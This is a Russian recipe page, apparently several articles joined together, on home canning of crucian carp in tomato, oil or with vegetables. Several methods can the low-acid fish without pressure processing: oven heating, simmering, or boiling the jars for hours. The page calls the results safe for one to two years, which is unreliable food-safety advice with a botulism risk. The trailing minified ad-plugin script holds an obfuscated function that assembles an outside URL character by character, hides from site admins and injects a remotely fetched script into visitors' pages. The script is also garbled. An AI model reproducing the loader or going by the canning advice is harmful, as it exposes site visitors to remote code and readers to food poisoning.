Консервы из карася рецепт

Консервы из карася

Караси — рыбки неприхотливые, но очень вкусные. Никто не откажется отведать карасей в сметане или запечённых в духовке. Солёная икра карася на вкус не уступает икорке ценных рыб. Гурманы очень высоко оценивают её вкусовые качества. Чтобы без потерь сохранить улов карасей, рыбу совсем просто законсервировать, добавив масло или томат.

Консервы из карася на вкус получаются гораздо лучше многих заводских, приготовленных из разных ценных сортов рыб. И несравнимы с ними по себестоимости. Под рукой всегда будет приятная закуска, ценный ингредиент для рыбных салатов или вкусных супов.

Как сделать консервы из карася

Консервацию любой речной рыбки производят двумя способами:

В казан или широкую и высокую чугунную сковороду с тяжёлой, плотно закрывающейся крышкой, укладывают чищенных и потрошёных карасей без голов/хвостов. Добавляют несколько листиков лавра, горошинки перца, другие специи по желанию. Ставят на сильный огонь. Когда выделившийся из рыбы сок закипит и из-под крышки пойдёт пар, нагрев уменьшают до минимума. Томят рыбу 4-5 часов. Горячей раскладывают в простерилизованные банки, тотчас закатывают.

В процессе томления не открывают крышку и рыбу не перемешивают, иначе она развалится, превратится в сплошное месиво. Можно перед тушением добавить растительное масло или разведённую кипячёной водой томатную пасту. На 1 кг карасей достаточно стакана масла или 2 ст. л. пасты, разведённой стаканом кипячёной водички. Вместо пасты можно использовать томатный сок или сделать его самостоятельно, проварив помидоры со специями.

  1. Закладка рыбы сразу в банки

Готовят стерилизованные баночки, на дно которых укладывают лавр и перец горошком. Можно добавить корни хрена, бутоны гвоздики и прочие специи. Укладывают рыбу, банки прикрывают крышками, ставят стерилизоваться. Время стерилизации зависит от выбранного способа. В мультиварке или скороварке 1-2 часа, в автоклаве — 40 минут, в духовке — 4-5 часов.

В банки также добавляют масло, томатный сок или обходятся без них. Масса рыбы с заливкой должна не доходить до горлышка банок на пару сантиметров, чтобы жидкость не вытекала при стерилизации. При желании добавляют овощи (лук, морковь, фасоль) или крупы (перловку, рис). Их укладывают послойно, чередуя слои рыбы и овощных/крупяных добавок.

Домашние консервы из карасей

Заготовки впрок можно делать любым понравившимся способом консервации речной рыбы. Или придумать собственные рецепты консервирования карася. Для тех, кто постоянно занимается овощными заготовками, процесс консервации не представляет сложности. Главное — тщательно стерилизовать посуду и все орудия труда. Тогда длительная сохранность гарантирована.

Как сделать консервы из карася с овощами

На 1 кг рыбы понадобится:

  • морковь — 1-2 шт.
  • лук — 1-2 шт.
  • масло растительное
  • сахар — 1 щепоть
  • соль — 1 ст. л.
  • специи — на свой вкус

Тушки карасей предварительно обжарить в масле до плотной румяной корочки.

Мелко порезать лук и морковь. Обжарить лук, затем добавить морковь и специи (соль, сахар, перец, свежую зелень, другие специи, на своё усмотрение). Влить 1-2 стакана водички, потомить полчаса на маленьком огне.

В банки уложить рыбу, поливая горячим соусом каждый слой, сразу закатать. Для длительного хранения (1-2 года) надёжнее дополнительно простерилизовать банки с рыбой, лишь после этого закатать.

Консервы из карася в томате

На 2 кг карасиков потребуется:

  • лук — 2 шт.
  • морковь — 2 шт.
  • масло — 1/2 стакана;
  • томатная паста — 3 ст. л.
  • сахар — 1/2 ст. л.
  • 7% уксус — 1 ч. л.
  • вода — 1 стакан
  • соль — 2 ст. л. (без горки)
  • специи — по вкусу
  • вода — 2 стакана

Мелкую рыбку оставить цельной, крупную разрезать на небольшие одинаковые кусочки.

Лук и морковь порезать тоненькими полукольцами. Морковь можно натереть или нарезать мелкими брусочками.

Сделать соус из томатной пасты, масла, соли, сахара. Остальные любимые специи добавить по собственному желанию. Хорошо перемешать смесь, подливая кипячёную воду.

Послойно уложить рыбу в чашу кастрюли-мульварки. Каждый слой рыбы посыпать морковью и луком. Полить соусом.

Выставить режим «Тушение», дать массе потомиться 3-4 часа. Затем горячую рыбу уложить в баночки, закатать.

За неимением мультиварки 5-6 часов тушат рыбу в посуде с толстым дном на небольшом огне.

Домашние консервы из карасей — шпроты

На 1,5 кг мелкой рыбы:

  • помидоры — 2-2,5 кг
  • лук — 2-3 шт.
  • соль — 1,5 ст. л.
  • перец — 8—10 горошин
  • лавр — 7-8 листов
  • сахар — 150 г
  • соль — 1,5 ст. л.
  • уксус — 100 мл
  • мука для обвалки рыбы
  • масло растительное для жаренья

Карасиков, порезанных кусочками, посыпать солью, дать часок полежать. Потом обвалять в муке, со всех сторон кусочки обжарить в масле.

Протёртые помидоры довести до кипения, добавить измельчённые овощи, сахар, перец, лавр, уксус и прочие приправы на своё усмотрение. Варить полчаса. Можно овощи предварительно обжарить перед добавкой в соус.

В прокипячённые баночки уложить слоями рыбу, заливая послойно томатным соусом. Банки поставить в кастрюлю с подогретой водой, кипятить около часа, закатать.

Будем благодарны читателям, если они в комментариях продолжат тему «Как сделать консервы из карася» и поделятся своими рецептами.

Подписывайтесь на нас в социальных сетях – через них мы публикуем много интересной информации, фото и видео.

Популярные разделы сайта:

Календарь рыбака позволит вам понять, как клюют все рыбы в зависимости от времени года и месяца.

Страница рыболовные снасти расскажет о многих популярных снастях и приспособлениях для ужения рыбы.

Насадки для рыбалки – подробно описываем живые, растительные, искусственные и необычные.

В статье прикормки вы познакомитесь с основными видами, а также с тактиками их использования.

Изучите все приманки для рыбалки, что бы стать настоящим рыболовом и научиться правильному выбору.

Готовим вкусно: консервы из карася в домашних условиях

Консервы из карася в мультиварке

Рыбные консервы – вкусное, полезное и питательное блюдо, которые вполне реально приготовить своими руками. Тем более, что для его приготовления необязательно использовать дорогую рыбу – вполне подойдет и обычная речная, в данном случае мы используем карасиков.

Рецепт рыбы с томатной пастой

Этот рецепт довольно прост и потребует минимум вашего времени и усилий. Для приготовления консервы из карася нам понадобятся:

  • небольшие караси – 1,5 кг;
  • лук – 2-3 штуки среднего размера;
  • морковь – 2 штуки;
  • томат – 250 мл;
  • масло растительное – 100 мл;
  • соль, специи, мука – по вкусу.

Совет. Всем известно, что карась – рыба с большим количеством костей, но поскольку мы готовим консервы, то опасения в данном случае излишни – все косточки попросту станут такими же мягкими, как и сама рыба.

Тщательно вымойте рыбку, очистите ее от чешуи (если это необходимо) и хорошенько выпотрошите. Хвосты и плавники срезайте сразу, головы также следует убрать (они не понадобятся). Затем натрите тушки солью снаружи и внутри, положите в холодильник минут на 5-10. После достаньте и тщательно промойте под струей воды.

Теперь рыбку нужно обжарить, предварительно обваляв в муке. В качестве емкости для жарки можно использовать как сковороду, так и мультиварку. Лучше, конечно, сковороду, чтобы потом не пришлось лишний раз мыть мультиварку перед началом тушения с овощами. Итак, рыбка обжарена. Делаем нарезку из овощей: морковь трем на крупной терке, лук нарезаем средними кольцами. Выкладываем в мультиварку лук, затем рыбу, после – морковь. Заливаем все томатом, посыпаем специями и солью.

Выбираем режим тушения и ожидаем окончания приготовления. В среднем, на это уйдет около четырех часов. После того как мультиварка просигналила о том, что блюдо готово, приступаем к закатыванию консервов в предварительно прокипяченные банки. Выкладываем карасей, сверху выливаем готовый соус и закатываем крышки. Зимой остается лишь наслаждаться отменным вкусом самостоятельно приготовленного рыбного блюда.

Рецепт рыбы с маслом

Для тех кто предпочитает консервы без добавления томата, предлагаем попробовать рецепт их приготовления на одном масле.

Итак, запасаемся карасиками (2 кг), растительным маслом (500 мл), солью, специями и лавровым листом.

Совет. Количество рыбы может быть различным, как кило, так и три. Главное при готовке консервов соблюдать пропорции: соотношение карася и масла должно быть 1:1.

Приступаем к обработке рыбы. Тщательно вымываем все тушки, очищаем (при необходимости) от чешуи и потрошим. Как и в предыдущем рецепте, избавляемся от плавников, хвостов и голов. Нарезаем карасей на кусочки среднего размера (толщиной около 3 см), затем кладем их на дно мультиварки, добавляем туда же соль, перец и лавровый лист, поломанный на несколько кусочков.

Сверху выливаем растительное масло (можно использовать как оливковое, так и подсолнечное). Теперь выбираем режим тушения и ждем, пока приготовится желаемое блюдо. Через 4-5 часов ожидания караси готовы! Вынимаем их из мультиварки и закатываем в заранее простерилизованные банки.

Консервы из карася в духовке

Для мультиварки мы предложили два отдельных варианта: один с использованием масла, другой – томатной пасты. В духовке же лучше всего готовить рыбные консервы с добавлением масла и томатов одновременно.

Предложенный ниже рецепт – универсален, а это значит, что таким образом можно приготовить как обычную речную рыбку, так и горбушу, скумбрию и т.д.

Нам понадобятся следующие ингредиенты:

  • карась – 1 кг;
  • растительное масло – 250 мл;
  • помидоры – 3-4 штуки (крупные);
  • морковь – 3-4 штуки (средние);
  • лук – 3-4 штуки (средние);
  • соль, перец, лавровый лист.

В качестве посуды для рыбы лучше всего использовать небольшие стеклянные банки, объемом 0,5-1 литр максимум. Тогда рыба хорошо протушится, и готовые консервы будет проще хранить не только в погребе, но и в обычном холодильнике.

Теперь приступаем непосредственно к процессу готовки:

  1. Рыбу тщательно моем, очищаем от чешуи. Затем ее необходимо выпотрошить и отрезать плавники, хвосты и головы. После режем рыбу не кусочки среднего размера.
  2. Приступаем к нарезке овощей: морковь и лук нарезаем кольцами, помидоры крупными кубиками.
  3. Выкладываем рыбу с овощами в сухие чистые банки, посыпаем специями и солью.
  4. Накрываем каждую банку слоем фольги и ставим в теплую духовку (ни в коем случае не в сильно разогретую, чтобы не лопнуло стекло) на 5 часов.
  5. За 5-20 минут до окончания готовки, доводим в небольшой металлической емкости растительное масло до кипения, затем вынимаем аккуратно банки из духовки и заливаем рыбу горячим маслом.
  6. Закатываем банки с консервами стерилизованными крышками.

Наша статья подходит к концу и мы были рады поделиться с вами простыми вкусными рецептами консервов из карася в мультиварке и духовке. Попробуйте любой из предложенных рецептов – уверены, вы добавите его в свою кулинарную копилку. Желаем удачи!

Рыбные консервы в домашних условиях: видео

Консервы из карася в домашних условиях – быстро, легко и вкусно!

Как известно, большинство людей любят употреблять в пищу не только свежую, жаренную или тушеную рыбу, но и консервированный продукт. А кто не любит консервы из карася в домашних условиях? Конечно, вкуснее домашней закрутки нет ничего на свете. Ведь, далеко не каждый производитель консервированной рыбы достаточно добросовестно и щепетильно подходит к делу изготовления данного популярного товара.

Как известно, большинство людей любят употреблять в пищу не только свежую, жаренную или тушеную рыбу, но и консервированный продукт. А кто не любит консервы из карася в домашних условиях? Конечно, вкуснее домашней закрутки нет ничего на свете. Ведь, далеко не каждый производитель консервированной рыбы достаточно добросовестно и щепетильно подходит к делу изготовления данного популярного товара. Да и при выборе нужного сырья не особо стремится использовать только высококачественную рыбу. Однако консервы из карася домашние – это прекрасная альтернатива магазинному продукту. Они и по стоимости намного дешевле, да и организму комфортнее. Полезность консерв из карася в домашних условиях – вне всякой конкуренции! А если приготовить этот кулинарный шедевр из рыбы, которую наловил муж, отдыхая на рыбалке, то положительных качеств и рентабельности данному блюду просто не счесть. Значит, давайте подробно изучим, как сделать консерву из карасиков быстро, легко и просто, не затрачивая много сил и энергии на данное мероприятие.

Консервы из карасей в томате – пошаговая инструкция

Для изготовления консервы из карася в томате потребуются следующие продукты:

  • рыба карась – 1шт. на 1-1,5 кг;
  • паста томатная и соус «Краснодарский» — 3-4 ст. ложки;
  • лук – 3 шт.;
  • морковка – 2 шт.;
  • уксус столовый – 1 чайная ложка;
  • соль, чёрный молотый перец, приправы.

Итак, давайте с вами научимся готовить консервы из карася, рецепт которого я позаимствовала у своей бабушки, слывшей большой кулинарной кудесницей.

Для начала, возьмём нашу рыбку, очистим её от чешуи, вытянем внутренности и отрежем голову. Желательно порезать её на порционные кусочки для пущего эффекта. Сложим всю рыбу в предварительно подготовленную кастрюльку и оставим на время, пока приготовим соус для заливки. В принципе, всю эту процедуру можно осуществить не в кастрюле, а в скороварке. Консерва из карася в скороварке получится еще эффектнее, полезней и питательнее. Ну, тогда, если имеется в наличии такое оборудование, то сложите рыбку в скороварку, посолите, поперчите её, посыпьте любимыми приправами и вперёд готовить соус. Возьмите пасту томатную или соус «Краснодарский», положите его в ёмкость и залейте водой, приблизительно 1 стаканом. Добавьте столовый уксус и всё тщательно перемешайте. Если вы хотите, чтобы домашняя консерва из карася получилась сладковатой и нежной, то приоритетнее использовать при готовке соус «Краснодарский». А если вы любитель кисленького, то возьмите лучше томатную пасту. Далее, залейте полученной жидкостью нашу рыбку в скороварке. Потом почистите морковь и лук. Морковь натрите на крупной тёрке или порежьте соломкой, а лук – полукольцами. Выложите все подготовленные овощи к рыбе в скороварку и тушите на протяжении длительного времени на слабом огне. У меня этот процесс длиться около 2 часов, пока кости рыбы не разварятся до мягкой консистенции. Да, всю эту массу нужно немного посолить и поперчить для остроты эффекта. Когда наш кулинарный шедевр готов, выложите его в тарелку, украсьте зеленью и подавайте к столу.

Консервы рыбные из карася на зиму

Можно также приготовить консервы рыбные из карася на зиму. Для этого мероприятия нам понадобятся следующие компоненты:

  • Караси среднего размера – 4-5 штук;
  • Морковь – 4-5 штук;
  • Лук – 4-5 штук;
  • Масло растительное или оливковое – 0,5 стакана;
  • Сахар – 3 ст. ложки;
  • Соль – 1ст. ложка;
  • Вода.

Итак, прежде чем готовить данное блюдо, нужно подготовить ёмкости, в которые мы будем закатывать нашу рыбку. Берём пол-литровые или литровые банки и стерилизуем их. А тем временем, чистим, потрошим, вымываем и отрезаем головы нашим карасям. Наливаем на сковородку побольше растительного или оливкового масла и обжариваем карасиков с обеих сторон до образования золотистой корочки. Готовим соус. Обжариваем на сковороде лук, порезанный полукольцами, и морковь, покрошенную соломкой. Когда овощи приобретут приятный желтоватый цвет, добавляем воду. Солим, перчим полученную массу и добавляем сахар. В обязательном порядке добавляем любимые специи. Они не только сделают блюдо индивидуально вашим шедевром, но и улучшат его вкус. Готовьте овощную массу приблизительно 20-30 минут на медленном огне, чтобы соус не кипел, а медленно томился на огне. Складываем в стерилизованные, подготовленные банки нашу рыбку и заливаем горячим соусом. Укладываем всё плотно и аккуратно. Закатываем железными крышками. Вот и все премудрости готовки домашних консерв на зиму!

Готовим консерву из карася в автоклаве

Ещё можно приготовить потрясающе вкусную и полезную консерву из карася в автоклаве, которая будет намного лучше магазинного аналога по многим параметрам. Итак, для приготовления данного блюда нам понадобятся следующие ингредиенты.

  • Рыба карась – 2-3 кг;
  • Растительное или оливковое масло – 0,5 л;
  • Морковь – 5 шт.;
  • Лук – 5 шт.;
  • Томатный сок или паста – 0,5 л;
  • Соус «Краснодарский» — 5 ст. ложек;
  • Чёрный перец горошек – 5 шт.;
  • Сахар – 5 ст. ложек;
  • Соль;
  • Мука или сухари – 2 ст. ложек для панировки.

Для того чтобы приготовить консервы из рыбки в автоклаве нужно почистить от чешуи и помыть наших карасей, нарезать их порционными ломтиками и положить в глубокую посудину. Посолите и поперчите кусочки карасей, обваляйте их в муке или панировочных сухарях и обжарьте до образования золотистой корочки с двух сторон. Выложите на большое блюдо, чтобы остыли. А тем временем, порежьте лук кольцами и морковь соломкой. Разогрейте сковороду, долейте подсолнечное или оливковое масло и положите туда овощи. Обжарьте овощи до золотистого цвета. Пересыпьте полученную массу в казанок и положите туда томатный сок, соус «Краснодарский» и немного воды. Тушите полученную массу на медленном огне около 25-30 минут. Затем, возьмите предварительно подготовленные пол-литровые банки и уложите в них рыбу и соус послойно. Слой рыбы, слой – овощного соуса и т.д. Плотненько укладывайте продукты, так как во время тушения всё содержимое банок значительно уменьшится в объёме. На одну банку добавьте 1 лавровый лист и несколько горошин душистого и чёрного перцев. Залейте содержимое банки растительным или оливковым маслом, чтобы масса была полностью накрыта. Законсервируйте банки и сложите в автоклав. Температура данного оборудования должна быть 120С 0 . Готовиться консервы должны 25-30 минут. После того, как они полностью остынут, достаньте банки из автоклава. Вот и всё! Вкуснейшие и полезнейшие консервы из карася готовы к употреблению.

Ещё можно приготовить шпроты из карасей, которые будут намного вкуснее и полезнее аналогичных магазинных товаров. И готовить такие продукты совершенно не сложно, даже приятно. Получать комплименты по поводу своей хозяйственности – очень приятная штука! Готовьте изумительно вкусно и живите здорово!

Консервы из карася

Никакого запаха карася. Отменный вкус, хорошая закуска. Как приготовит консервы из карася.

Консервы из карася? Как-то необычно, – скажете вы. И действительно карась как-то не фигурирует в перечне рыбных блюд в качестве консервированного продукта. Надо признаться, тоже думал, что из моей затеи ничего не получится. Ведь, как известно, карась имеет специфический запах, особенно карась, живущий в прудах, сильно заросших водной растительностью и ряской. Этот довольно резкий карасёвый запах не спутаешь ни с каким другим запахом от рыбы. Ещё Сергей Тимофеевич Аксаков предлагал перед готовкой выдерживать карасей пару дней в садке-сажалке, который помещался в проточную воду. Это чтобы исчез запах тины. Но в больших и чистых прудах, где есть небольшое течение и мало растительности, караси не имеют резкого запаха.

После одной из рыбалок на таком пруду, когда я не отбраковывал карасей по размеру и брал всех, в том числе и плотву, пришлось задуматься: а что же делать с оставшейся рыбой после отбора самых крупных карасей на жарёху? Плотву засолил для вялки, накормил кошек, а из мелких карасей решил сделать консервы, причём в мясляно-томатной заливке, ну, как кильку в томате. Правда, знаменитая в СССР закуска делалась без масла.

Итак, проделана каторжная работа по чистке рыбы. Поскольку в нашей семье я единственный люблю и ем рыбу, то и чистить её приходится мне. Надо снять чешую, выпотрошить карасей, обязательно отделить головы, убрать чёрные плёнки с внутренних сторон брюшка.

Затем надо нарезать карасей на дольки и поместить в скороварку, после чего налить воду до уровня рыбы или чуть ниже этого уровня. Если вам нравится обилие желе в консервах, то воды можно добавить до уровня рыбы. Любителям консервов плотной структуры лучше доливать воду ниже уровня рыбы. Когда вода выкипит, то консервы будут крепкими и плотными.

Далее следует довести воду до кипения, добавить соль по вкусу, сахарный песок (1 столовую ложку или больше по вкусу), нарезанный репчатый лук (1 среднюю луковицу), молотый чёрный перец, листик лаврушки, много растительного масла (около 200-300 мл) и 3-4 столовых ложки хорошей томатной пасты без крахмала. Затем закрываем скороварку и приводим в рабочий режим.

Часа через три консервы из карася будут готовы.

Следует остудить их до 60 градусов, добавить 2 пакетика по 10 граммов быстрорастворимого желатина, тщательно перемешать и выложить консервы в баночки, которые надо поставить на часок в морозильную камеру, чтобы желатин схватился быстрее. После этого консервы из карася можно пробовать. И никакого запаха карася уже не будет, а будет отменный вкус и хорошая закуска, особенно если есть с горячим картофельным пюре, холодным малосольным огурчиком и под рюмочку ледяной водки… Приятного аппетита!

Советую прочитать:

Один комментарий

Консерва из карася
1 литровая банка

Берём литровую банку с резьбовой крышкой.
На самую дно столовой лошки растительного масла и столовой лошки томатной пасты, складываем один ряд очишенных карасей, соль по вкусу.
Складываем второй ряд карася. Соль, красный перец молотый, черный перец молотый по вкусу, лавровый лист и одну столовой лошки томатной пасты. Ёше один ряд карася, соль по вкусу.
Следующий ряд карася. Соль, красный перец молотый, черный перец молотый по вкусу, лавровый лист и одну столовой лошки томатной пасты. Ёше один ряд рыбы карася, соль по вкусу.
С такой порядкой наполним банку, слегка прессуем и ешё ряд в таком порядке.
Закрываем банку с резьбовой кришкой (только не плотно, при кипячении пар должен выходит из банки, в противном случае банка может лопнуть).
Одновременно можно заправить несколько банок.
Банки аккуратно ставим в кастрюлю. Между банками в кастрюлю заливаем воду, закрываем кришку кастрюля и ставим на огонь. Сразу после закипения убавляем огонь как можно меньше (вода не должно бурно кипеть). В таком порядке кипятим 7 часов. Нужно заглядывать в кастрюлю примерно каждый через час полторы, если вода уменьшается можно добавлят только кипяток, если залит холодной водой банки могут треснутся. Спустя 7 часов банки снимаем с кастрюли открываем и заливаем кипятком так как при приготовлении жидкость в банке испаряется и рыба становится суховатым, закрываем опятже не плотно и еше кипятим 1 час.
После завершения кипичения, банки снимаем из кастрюли и плотно закрываем кришкой.
Консерва готова можно убрать для сохранение на зиму.
Я эксприментально сахранял 1,5 года ничего не случилось.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};